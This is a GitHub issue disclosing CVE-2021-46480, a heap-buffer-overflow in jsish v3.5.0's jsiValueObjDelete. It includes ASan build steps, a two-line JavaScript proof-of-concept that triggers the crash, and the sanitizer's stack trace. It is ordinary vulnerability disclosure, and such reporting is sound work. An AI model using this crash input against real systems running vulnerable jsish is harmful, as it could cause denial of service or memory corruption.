CVE-2021-46480: Heap-buffer-overflow src/jsiEval.c:464 in jsiValueObjDelete · Issue #61 · pcmacdon/jsish

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

Comments

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CFLAGS=’-fsanitize=address’ make

Test case

var arr = []; arr.x = 0; delete arr[assert(hasProperty, ‘hasProperty !== true’)];

for (var i = 0; i < 2; ++i) arr.unshift(i);

​

Execution steps & Output

$ ./jsish/jsish poc.js

===ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000df38 at pc 0x5566ebe0b2f9 bp 0x7fffd0654660 sp 0x7fffd0654650 READ of size 8 at 0x60600000df38 thread T0 #0 0x5566ebe0b2f8 in jsiValueObjDelete src/jsiEval.c:464 #1 0x5566ebe0b2f8 in jsiEvalCodeSub src/jsiEval.c:1885 #2 0x5566ebe1915e in jsi_evalcode src/jsiEval.c:2204 #3 0x5566ebe1d274 in jsi_evalStrFile src/jsiEval.c:2665 #4 0x5566ebb0c66a in Jsi_Main src/jsiInterp.c:936 #5 0x5566ec31103a in jsi_main src/main.c:47 #6 0x7fbbb1d73bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #7 0x5566ebaa0969 in _start (/usr/local/bin/jsish+0xe8969)

Address 0x60600000df38 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiEval.c:464 in jsiValueObjDelete Shadow bytes around the buggy address: 0x0c0c7fff9b90: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa 0x0c0c7fff9ba0: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd 0x0c0c7fff9bb0: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff9bc0: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c0c7fff9bd0: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00 =>0x0c0c7fff9be0: 00 00 00 fa fa fa fa[fa]fa fa fa fa fa fa fa fa 0x0c0c7fff9bf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb

Credits: Found by OWL337 team.

1 participant